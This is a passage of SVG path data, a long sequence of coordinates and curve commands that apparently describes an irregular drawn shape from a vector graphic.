4.32,24.32,0,0,1,2.7,0c2.6.1,5.3.7,7.3.4-3.5-.1,0-.7-4.8-.8,1.2.2-2.4.4-2.6.2-1.8-.5,8.2-.3,2.1-.8a8.77,8.77,0,0,1-2.8,0c4.1-.4.9-.9,1.6-1.4,2.1.3,2.2.8,6.5,1-1.4-.5.1-.7,3.5-.8-5.1-.2-7,.1-8.6-.3,4.2.1,1.1-.6,5.1-.5-4.8.1-7.6-.5-8.6-.3,5.3.4-3.5,0-2.6.2,2.3,0,2.8.7.5.6.4-.3-3.5-.9-4.7-.7,3.5.1.6.4-1.1.3-3.3-.3.4-.3-.6-.7-2.7-.2-4.5.2-5.7-.1.6-.6,4.6-1,1.1-1.9,3.8.5,5.1-.5,8.3,0-2,.2-3.5.8,2.4,1.1-2-.6-3.2-1.6,1.2-1.8,2.1.7,1,.8-1.7,1.3,7.7.1,9.3.4,17.3.7.8-.3-4.6-.9-4.9-.8-1.6.2,5.9.5,1.8.5a36,36,0,0,1-7.6-.7c4.5-.1.6-.4,2.1-.8,5.7.3,2.7-.2,5.4-.2,2.8.3.4.3.5.6,8.8.1-.3-.4-.7-.8,2.5,0,4.4.1,5.8.2a9.4,9.4,0,0,0-3.2-.5c-1.5.5-12.5-.4-10.5-.9a54.5,54.5,0,0,1,7,0c.1-.2-1.8-.3-1.8-.5,5.1.1,3.5-.4,8.1-.3-2-.5-.4-.5-4.8-.8-4.1,0-.1.4-2.5.4-2.2-.1-5.6-.7-2-.7,4.6.1,7.7.5,8.3,0-7.3.1-1.1-.2-4.5-.4a87.83,87.83,0,0,1-9.6.1c-1.1-.7,1.9-.8,1.7-1.2,1.8.3,1.6.8,5,1,4.9-.4-3.4-1.4,2.8-1.6-3.5.4,3.8.5,6.3.9,1.7-.2,4.5.3,5.6,0a41.63,41.63,0,0,1-6-.5c4.4,0,6-.5,9.5-.2-2.3-.6-8.7-1.4-.2-1.8,1.5.2-3.9.3.4.4a3.3,3.3,0,0,1,1.4,0c.8.3-6.5-.2-4,.2,7.2.3,6.1,1.1,9.8,1.6-3.9-.2-2.6.2-4,.2,3.4-.1,3.9.6,5.8.2-5.3-.3,2.2-.3.9-.5-6.7-.3,1.5-.7-3.9-1.3,2.1.1,5.2.1,5.8.2-.4.1-3.1.3.4.4.2-.3,1.9-.4.7-.7-2.5,0-3.4-.2-3.1-.4a42.45,42.45,0,0,1-7.3-.4c4.4,0,6,.4,7,0-6.1-.3-10.4-.7-14.8-1.1a37.36,37.36,0,0,0,5.5-.1,4,4,0,0,0,1.6.3c-1.9-.6,4.9.3,5.5-.1-9.7-.4-2.6-.4-9.2-1,4.7.2,3,.2,5.6,0,.7.6.3.1,4.3.2.1.1,1.3.2,1.6.3-4.1-.3-3.5.4-1,.4a83,83,0,0,1,8.5.2,36.57,36.57,0,0,0-8-1.2c.8-.5,1.5-.9,7.8-.6.5.3-2.9.2-3.9.3,3.9.5,5.4,1,8.2,1.4-2.5-.4,5.9-.2,5.6,0-1.6.3-5.8.7-.7.7-7.8,0-4,.8-10.4.7-.3.4,3.9.5,6.2.7-3.6-.1-1.9.4-3.8.5a38.81,38.81,0,0,0-6.9.1c4.4.1-2,.7,1.8.5.6-.1,1.3-.2,2.5-.3-.4.3,2.4.5,3.4.7,4.8.2,1.8-.4,8.2-.1-.6.2-.3.4-2.4.5-1.1-.3-2.5.2-5.5.1,2.2.5.4.5,1,1.1,7.5.2.4-.5,2-.9,10.8.2,9-.7,17.4-.7-1.7-.4-6.7-.5-2-.7-2.3-.1-4.7-.1-7.1-.2-.4.3,4.6.3,3.4.7a17.57,17.57,0,0,1-3.9.4,30,30,0,0,1-3.6-1c4.5.1,1.7-.4,4.3-.4-8.9,0-4.1.8-12.1,1,1.8-.5,2.6-1.3,12.5-1.6-.5-.2-2.3,0-2.9-.2,1.4,0,1.6-.2-.2-.2.9.2-3.3.5-4,.2,1.8-.2,1.7-.7,4.9-.8,2.9.1,1.7.4,4.6.5.6-.1,1.8-.2,2.5-.4-2.8-.1-9.4-.5-4.8-.7,2.7.7,2.1-1,9.3-.4-.8-.3-4.8-.4-3.5-.8,6.2.4,2.4-.1,5.4-.2,3.2,1.3,6.6,3.1-2.7,3.2,1.8.7,1,1,2.7,1.5,1.9,0,3.2.1,4.3.2-.5-.4,6-.1,6.6-.4-4.1,0-6.9,0-8.5-.2.9-.3-4.8-.7-.7-.8,1.7.2,1.9.4,2,.7,5.3,0,11.5-.5,7.4-1,.1.3.2.6-3.8.5.7-1.4-7.4-3.4,9.8-3.1-5.5-.3,7.8-.3.7-.7-1.4.1-.1.4-4,.2-1.1-.5-.4.1-4.3-.1a5,5,0,0,1-.6-.7c-6.1-.2-4.2.4-9.4.3,3.8-.7,20.4-1.5,5.1-2.1,0-.1-.1-.1-.2-.2,3.4-.1,6.2.5,7.1.2-2.2-.1-4.6-.3-4.6-.5,6.3.2-1.7-.6,2.1-.7,6.8.6,6.8,1.5,6.1,2.2,1.6.1,2.3.2,3,.3,5.8.3,7-.3,9.8.1-2.6.2-2.7,0,.3.3-3.9,0-5.2.3-4.9.8,7.7.2-.3-.4,3.8-.5,8,1.3-1.1,1.5,2.4,2.7,6.5.3,3.7.7,10.4.8-5.3,0-8.5.3-11.3-.3-1,.3,4.5.9,6.2.7-1.2-.2,3.8.3,3.9-.2a21,21,0,0,1,4.8.8c-2.5.1-2.6-.1-7.1-.2-.4.4-.5.3.7.8,1.9.3,5.1-.1,7.2.3a40.53,40.53,0,0,0-6.4.6c9.2.7,4.1,1.5,4.8,2.3-3.3-.1-9.6,0-5.3.2,1.8-.1,4.6-.2,8.2-.1-2.1.3-4.3.4-.6.9-7.5-.2.5.6-5,.7,2.1.1,7.2,0,7.2.3l.2.2c-5.1-.1-7-.4-11.5-.5-1.7.4,6.4.2,4.6.5,4.1.2,3.5-.1,7,0-1,.5,4.6,1.1-1.5,1.5,5.6.2,3,.5,4.8.8-.9.2-7-.2-5.4.2,2.7,0,3.2.2,5.8.2.1-.1.2-.3,2.7-.2,10.2.6,3.7,1.5,3.2,2-.1.1,7.4,1.2-2.3.6,1.7.3,2.9.8-3.7.6.6-.2,3.2-.2,2.3-.6-4.2-.1-5.1-.4-8.8-.5,1.5.5-4-.3-2.5.3.8.4,7-.1,8.6.3a17.63,17.63,0,0,1-3.9.4c-1.46-.17-2.93-.27-4.4-.3-.6.2-3.2.7-.6.9,2.4,0-.6-.5,2.3-.5,2.7,0,11.7.5,2.9.2-.1.4,8.2.3,6.3.8-2.4,0-3.8-.2-4.3-.1.2.4,3.7,0,6,.5a51.1,51.1,0,0,1-5.4.2c4.4.5-2.2,1.3,6.4.9a3.92,3.92,0,0,1-2.3.5c-1.5-.4-2.2-.2-5.8-.2,1.4.6-.8.9-1.6,1.4,3.3.2,5.1-.2,5.7.1-3.6-.1,2.1.2.4.4-2.1,0-5.3-.2-5.6,0,.5.5,3.4,1.1-1.9,1-.9-.2,1.2-.5-1.9-.6-3.9.3,4.3.8,1,1.1,1.9,0,3.8.1,5.7.1,0,.4,5.7,1-3.5.8,2.7-.4-5.2-1-10.5-.9.1.3,1.4.7-.6.9,2.1.3,4.1-.1,5.8.2-2.1.3,6.3,1.5,3.1,1.9,2.8,0,.7-.5,5.2-.4,5.3.9-3.4,1.6-.9,2.2a37.63,37.63,0,0,1,3.8-.5c2.3.6-2,.9-1.3,1.7.1.1,2.6.2,3,.3-.1.5-7,.9-11.7.9,9.5.3,8.4-.3,12.1-.5,3.8.6-3.6.6,1.1,1.2,2.2,0-.8-.6,3.9-.3-3-1-7.2-2,.6-2.5-2.3.7,1.1.3,4.8.8-.2.3-5.2.7-3.4.9a11.09,11.09,0,0,1,2.7,0c3.5.4-2.9.9.8.9-.2-.2.8-.3,2.5-.3,3.9,1.1-2.2,1.4,4.7,2.2-9.4-.1,2.3,1.7-6.9,1.6-1-1.1.2-1.6-2.1-2.4-3.4.1-2.8-.4-4.7-.7-6.5.4,2.1,1.5,4.6,2.1-1.8,0-1.8.1-4.1,0,.6-.4-2.9-.5-2.2-.9-2.4,0-7.6-.2-6.8.2,2.7.1,3-.1,5.6,0a7.57,7.57,0,0,0,.8.9c-9.5,0-9.1-.2-18.5-.5,0-.1,1.7-.1,1.1-.3-10.1-.2-11.8-.9-16.5-1.4-3.8.3,5.7.5,3.7,1.1a21.29,21.29,0,0,0-4.3-.1c4.4,0,1,.6,6.1.6-.4-.3.3-.4,2.3-.5.2.1,2.6.2,3,.3,1.5.4-1.9.3-2.4.5,1.1.1,2.8.1,2.9.2,5.7.2-1.9-.4,5.4-.2,9.1.7,19.7.5,16.6,1.5-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.8,1-2.8,1.5-3,2.9,3.4.2,5.1-.2,5.7.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7-.4.3-4.2.2-6.7.3,2,.2,5.3.2,7.3.4.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a44.62,44.62,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2A60.14,60.14,0,0,1,434,68.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.52,31.52,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0h0c3.1,1.1,11.5,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4h-1.3c-4.1-.1-5.1-.3-4.9-.7a17.46,17.46,0,0,0,5-.3c1.4-.4,1.6-.8,8.3-.4-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-5.5-.6-3.8-2-7.2-3a23.68,23.68,0,0,0-2.9-.6h3a16,16,0,0,0,2.5-.1,15,15,0,0,1-2.4-.2c-1.6-.2-2.7-.3-5.1-.4,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.91,97.91,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.8-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.15,66.15,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7q1.65.3,4.2.6c1,.1,2.1.2,3.5.3,5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1a24.24,24.24,0,0,1-3.2.3c-2.1.1-3.8.2-1.6.6-.9-.2.2-.2,1.5-.1,1.1.1,2.4.2,2.8.2a5.67,5.67,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.52,31.52,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a27.09,27.09,0,0,1-3.1-.3,17.94,17.94,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.09,41.09,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.06,9.06,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.82,31.82,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a4,4,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.81.2,1.91.3.41.4,11.19.3.19-1.1,0-1.6s10.4,0,9.09-.7a35.68,35.68,0,0,0-4,.1c-2.19-.5-5.59-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.19-.3-6.19-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.59,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-3.7-1.5,5.5-1.6-7.2-1.3-3.3-3.2,2.1-3.9a14.11,14.11,0,0,0,2.9.2c-.4-.3-1.3-.5-3.4-.7-.1.1-.2.3-2.6.2-.7-.8,1.2-.9.1-1.4,2.1.1,3.7.2,5.9.4-2.5-.7,4.1-.6,1.6-1.3-3.9,0-3.7.3-7.1-.2a27.6,27.6,0,0,0,5.3-.3c-2.3-.3-5.8.1-7.3-.4.4-.7-1.2-.7-2.7-1.5,5.6.2,4.7-.5,9.6-.1.3-.7,3.6-.7-2.5-1.3,4.4.3,5.4-.1,10,.3.1-.2-1.8-.3-1.8-.5-3.1,0-7.5.1-8.6-.3,2-1.1,6.3-2.5-1.7-3.5,2.5,0,4.4.1,5.8.2-.2-.2-.3-.4-.5-.6-3.6,0-5.2-.2-4.6-.4,6.1.4,2.5-.2,8.31,0,4.09.6-1.5.9-2.91,1.5,7.9.4,6.31,1.6,2.5,1.9,7.9-.3,6.81-1.8,4-2.4,3.2-.6,7.5-1.1,8.1-1.9a20,20,0,0,1-4.5-.4c-4.4-.2-4,.1-8.4-.1-1.7.4,4.1.3,3.3.6-6.9-.3-3.09.4-9.59.1.8-.5,6.4-1.1-1.31-1.4-.19-.2-.3-.4-.5-.6,1.9.2,5.31.2,7.31.4.19-.6-7.5-.1-7.6-.7,2.3-.2,5.69-.1,1-.4,4.5-.2,7.8.4,9.9.2-2.4-.1-3-.8-.7-.8a28.18,28.18,0,0,1,5.8.3c-7.3-.3,1.2.7.9,1-2,.1-5.7,0-6.8.2,6.9.2,1.1.6.7.8,9.1.1,6.7-.6,7.6-.8,4.4.1,1.3.4,6.19.7-1.59-.5-5.9-1,.41-1.1-3.7-.1.69-.7-6.2-.7-1.7.3,4.4.7.6.7-6.7-.6.3-.7,1.8-1-4.7-.2-.8.3-5.5.1-.1-.1-1.3-.2-1.6-.3-.9-.6,2.2-.6,6.1-1-1.1-.3-2.1.1-4.2,0-.1-.2-.9-.3-1.7-.4a29.51,29.51,0,0,1,5.4-.2c3.7.1,1.5.5,6,.5-1.5-.5-2-.6.6-.9-1.5-.3-6.2-.3-6.1-.7.2-.2,3.6-.1,3.8-.3-2.2-.2-4.4-.9-1.2-1.3-2.9-.2-4-.5-6.2-.7-1,.5,2.5.8-2,.9-.8-.1-1.7-.3-3.1-.4,0,.3,2.5.4,3.3.6-8.8-.3-.5.7-3.6.7-1.9-.1-2.8-.2-5.8-.2,4.2.7,6.8,1.7-1.1,1.9,8.3.1,2.8,1.2-3.7.6.5.6,4.2.3,6.2.7-2.6,0-3.3.2-6.9.1-8.2-1.2-2.7-1.7,3.4-2.4-4.5-.8-1.7-1-4.1-1.5,1.4,0,2.8.1,4.3.1-3.9-.2-2.3-1.3-6.5-1,3.7.3,1.7,1-1.9.9-1.6-.7,1.5-1-.1-1.7a29,29,0,0,0,6.9-.1c-8.3-.2-6.2-.8-1.9-.6-1.9-1,3.8-1.9-1.4-3.2,5.4-.1,5.3-.7,1.7-1.2a41.25,41.25,0,0,1,4.3.2c-1.9-.5,1.1-.5,3.7-.6-4.2-.5-4.8.3-7,0a13.65,13.65,0,0,1,5-.7c-.1-.8-5.1-2.5.1-3.1-5-.8-7.6-4.5,1.6-2.9.7-.7-2-1.7-2-2.2,1,.6.7-.2,5.7.1-1.5-.4-2.1-.4.9-.5-6.7-.2,1.7-.7-3.7-1.1.1.1-1,.1-1.4,0h8.3c3.9.4,1.1.4,3.5.8,4.8-.1,4.7.2,8.7.4-3.4-1.5-1.3-1.2.7-2.4-5.2-.2-1.3.5-5.2.4-.2-.2-.3-.4-.5-.6-2.6,0-4.7,0-5.5.1,5.2.1-.6.3,4.6.5-1.1.1-.7.4-5.4.2-.5-.2.9-.5-3.2-.5,1.3.3,2.5.6-.8.6-5.4-.7.6-2-5.4-3,4.6-.2,5.6-2.2-2-2.3,3.1-.2,2.2-.1,6.8-.2,1.8.4-2.1,1.1,3.9,1.3-1.4-.5-3.7-1.3,3.6-.7,0-.3-4.5-.4-4.7-.7,1.9,0,3.8.1,5.7.1.1.2.2,1.1,3.4.7-4.1-.3-.4-.7.6-.9-3-.3-4.9-1.5,2.9-1.5,1.6.1,2.3.2,3,.3-.1.4-3.7.8.9,1a58,58,0,0,1-7.1-.2c-.1.5,4.3.2,6,.5-2.8.1-5.6.2-.9.5,4.3-.2,7.2-2,1.7-2.8,5.5-.3-5.2-1.9,9.6-1.7-1.6-.3-1.3-.9,3.4-.9.7-.3-4.1-.3-3.3-.6,2.6-.6,8.2-.3,16.3-.4-7.9-.2-7.2-1-3.9-1.3a21.78,21.78,0,0,1,3,.3c4.5-.3-7.8-.8-.8-.9,4.4-.1,2.5.7,4.4.3-3.6-.5,4.1-.4-2.1-.8.7-.2,4.1-.1,5.4-.2-5.9-.4-6.3-2.4,3.9-1.9-6.5-2.2,6.1-4.8,5.3-6.6,2.7.1,6.1.2,6,.5-1.9,0-6.3,0-1,.4-.4-.2,1.2-.2,4-.1,2,.4-3.7.6.8.9.3-.3,1.7-1,1.7-1.3-1.5-.1-6.6-.2-8.8-.5,10.4.4.7-.4,5.1-.5,2.3.4,8.5.3,5.6,0,.1.3-4.7-.1-4.4-.2,1.2-.4,14.8-.2,9.1-.7-3.4-.1,1.2.5-4,.2-5.8-.3.3-.7.5-1-8.6-.4-11.4-1-9.7-1.5.7.5,2.7.3,7.3.4-.1-.7-2.1-1.2,2.7-1.7.5.2,0,1.1,2.1.8-2.1-.6,3.6-.5,6.8-.2-3.1-.6,2.5-.5-2.3-1,1.8,0,1.8-.1,4.2,0s3.4.3,3.2.5c5.9-.2,6.5-.3,10.6-.6-3.7-.2-4,.3-5.6,0,1.2-.4-3.4-.5-3.5-.8,6.7.2,3.8-.5,6.4-.6,6.4.6-4.8.8,2.5,1.3-.3-.3,1.6-.6,6.6-.4,1.1.3-1.1.8,2.19.9,2.2-.5-.69-1,8.9-.9-6.3-.3-.4-.9-5.4-1.4,2.7-.1,2.81.1,5.6,0-2.69-.4,4.8-.3.9-.5.1.3-4.69-.1-4.4-.2,3.6.1,2.5-.3,2.31-.6,4.4.2,4-.1,8.4.1-5.1-1.2,5.4-1.7,3.09-2.8,2,0,7.4.3,7,0-4.3-.3-5.8-.7-3.59-1a21.48,21.48,0,0,1,3,.3c2.91-.4-1.4-2.1,8.6-1.3-4.5-.5-8-1.6.2-1.3-1.3-.4-6.5-.2-7.3-.4,11.4-.8,2.1-2.3,8.8-3.2,6.2,1,4.4.1,5.3-.1-1.7-.3-2.3-.6-3.6-.9,0-.1-.4-.2-1.8-.4-.3-.1-.7-.1-1.1-.2.2,0,.4.1.6.1-.4,0-.7-.1-1.2-.1a31.52,31.52,0,0,1,4-.2l1.2.3a1.25,1.25,0,0,1-.6-.1c0,.3.1.6,2.4,1-.19-.2-.1-.2.1-.3a3.88,3.88,0,0,1,1.6,1,4.91,4.91,0,0,1-.5-.1c.2,0,.3.1.5.1a.79.79,0,0,1,.2.7h0c0,.1-.1.3-.1.4a5.54,5.54,0,0,0-1-.2c-3.2-.2.1.8-2.5.8a24.16,24.16,0,0,1,4.3.9c-3.1-.5-4-.2-1.8.4-2.1-.1-3.4-.7-5.2-.8,2.8.5,2.5,1.1,3.5,1.2,0-.1.2-.2,2,.1,2.1.5-.7.2.3.7,3.91.7,1.6-.2,3.91.1-.81.5,3.19.6,3.19.6,4.1,1-1.4.4-3.9,0,4.1.6,7.5,1.6,8.3,1.3-4.4-.9,1.7-.1-2.5-1.2a21.08,21.08,0,0,0,4.1.5c-2.2-.6-4.4-.5-5.4-1.1,1.4-.7,10.6,1.5,9.7,2.1,2.1.1,1.4,0,.7-.5,3.6,1,2.4.2,4,.3,1.3.4,1.1.6,1.3.9a5.08,5.08,0,0,1-.8.3,3.07,3.07,0,0,0-1-.2c.5.3.3.4,0,.5-.5.1-1.1.3-1.7.4,1.3.7,1.6,1.4,1.7,2-.2,0-.4-.1-.6-.1,1.5-.3-1.3,0-5.2-.9.3.2-.2.4,1.3.7.1-.7,2.5,1,4.2.8-2-.4-1.1-.4.4-.3a1.52,1.52,0,0,0,.1.6c-1.2,0-2.8-.1-3.1.2,1.5.3,2.6.5,3.3.7a3,3,0,0,0,.4.7h-1.09a10.53,10.53,0,0,0,1.4.3,5,5,0,0,0,1.1.7c-.7,0-2.91-.4-3.1-.3,4,.8-.1.4,3.4,1.1a19.63,19.63,0,0,0-2-.2,13.53,13.53,0,0,0-2.3-.7c-.91,0-1.1,0-.91.1-3.8.7,8.1,2.3-3.09,2.4a5.23,5.23,0,0,0-1.31-.1c-2.1-.4-1.69-.7-4.69-1.2a11.09,11.09,0,0,0,3.5,1.2c-.1-.2,1.8.2,2,.1a4,4,0,0,1-.5-.1c6.4.4,2,.5.5.9,3.9.2,6,.5,1.9.6,9.5.6,1.8-.5,3.19-1.1a9,9,0,0,0,3.1,0c.2.1.5.2.9.4.7-.1,4,1,5.5,1.4,1.1-.4-6.5-2.1-.69-1.6a12.16,12.16,0,0,0,4.3.9c-1.3-.4-2.8-.8-4.4-1.2-.9-.6,1.5-.4,2.69-.4-1.59-.3-3.8-.6-4.3-.8h.4c1.31.3,2.81.6,4.7,1,.8,1.5,4.6,3.6,1.8,5.2,10.7-.4-2.6-2.5,7-3.1,1.9.1,4.1.2,6.1.2.5.2.3.3,3.1.6-2.1-.1.4.5,1.3.9,1.5-.4,1.6-1,1.5-1.6a87.43,87.43,0,0,1,12.3-.9c-2.4-1.2,3.31-2.2,10.5-2.8-.8.3-1.8.5-.2,1-.09-.1.31-.2,1,.1.31.4-5.19-.7-5-.3,2.5.5,4.31.3,5.2.8-3.5-.3.1.2,1.3.7-2.19-.2-1.69.3-3.9-.1,7.5,2.1-1.3,1.5.2,2.5-3.9-.6-3.8-.2-4.9,0,3.9.7,1.7-.3,5,.3-1.4.8,3.8,3.1,7,4.6-2.8-.4-2.2-.6-4.3-.9-.6.3,4.1.9,4.5,1.3-4.3-.2-10.3-.5-3.3,1.2.1-.2-.6-.5.8-.3.1.3,5.7,2.1.8,1.7a39.85,39.85,0,0,1-4.4-1.1c1.4.2,1.8.1,1.9-.1-3.3-.5-2.9-.8-5.4-1.2-1.3.2,3,.7,2.4,1-2.9-.5-2.2-.6-4.2-.7,2.4.6,3.1,1.4,5.6,1.6-4.5-.5,2.4,1.6-2.4,1.2-2.7-.5,2.5-.2-2.4-.9-.6.1-.4.5.5,1,4.6.9-1-.4,2,.1,4.6.7,3.8,1.7,6.7,1.9-4.4-1.4.2-1.5-4-2.3,2.8.2,3.2-.2,6.9.3,0,.4.5.4,1.6,1.3-3.1-.4-10.1-.8-1.6.6-1-.6.7-.4,2.9-.1-2.3,0,3.5,1.1.4,1,4.6.7.8-.8-.6-1.2,1.3.2,1.5.4,3.2.6-2.5-1.8.9-2.1,4.6-2.7-5.4-.9-3.1.2-8-.6a8,8,0,0,0-1.2-.4c3.3.5,3.4.2,2.8-.3,3.6.6,4.4.5,6.1.7-7.1-1.7-3-2-1.1-2.3a20.39,20.39,0,0,1,2.